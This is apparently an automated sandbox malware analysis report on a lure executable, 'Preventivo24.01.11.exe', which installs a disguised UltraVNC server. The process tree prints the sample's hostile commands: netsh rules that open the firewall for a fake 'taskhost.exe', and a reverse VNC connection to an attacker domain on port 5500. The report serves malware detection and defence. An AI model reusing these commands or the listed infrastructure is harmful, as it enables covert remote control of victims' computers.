Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name:Preventivo24.01.11.exe
Analysis ID:1379424
MD5:32f35b78a3dc5949ce3c99f2981def6b
SHA1:18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Preventivo24.01.11.exe (PID: 5924 cmdline: C:\Users\user\Desktop\Preventivo24.01.11.exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B)
    • msiexec.exe (PID: 7216 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • viewer.exe (PID: 7424 cmdline: C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
    • cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • reg.exe (PID: 7576 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WMIC.exe (PID: 7592 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • findstr.exe (PID: 7600 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • Acrobat.exe (PID: 7676 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7212 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • viewer.exe (PID: 7704 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
        • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 8000 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
          • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • reg.exe (PID: 7804 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7804 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • mode.com (PID: 2840 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
            • netsh.exe (PID: 2132 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • netsh.exe (PID: 5924 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • WMIC.exe (PID: 8216 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • findstr.exe (PID: 8244 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • taskhost.exe (PID: 8488 cmdline: C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run MD5: 663FE548A57BBD487144EC8226A7A549)
          • viewer.exe (PID: 8508 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
            • cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • viewer.exe (PID: 8516 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
            • cmd.exe (PID: 8608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 8704 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 8724 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 8740 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • timeout.exe (PID: 8540 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8960 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 9108 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 2840 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8456 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7800 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7968 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 736 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 888 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8004 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 8400 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8444 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308
SID:2834928
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Preventivo24.01.11.exeVirustotal: Detection: 17%Perma Link
Source: Preventivo24.01.11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE3210 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3C10 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,
Source: C:\Games\taskhost.exeCode function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\

Networking

barindex
Source: TrafficSnort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Source: global trafficTCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500
Source: Joe Sandbox ViewIP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
Source: global trafficHTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
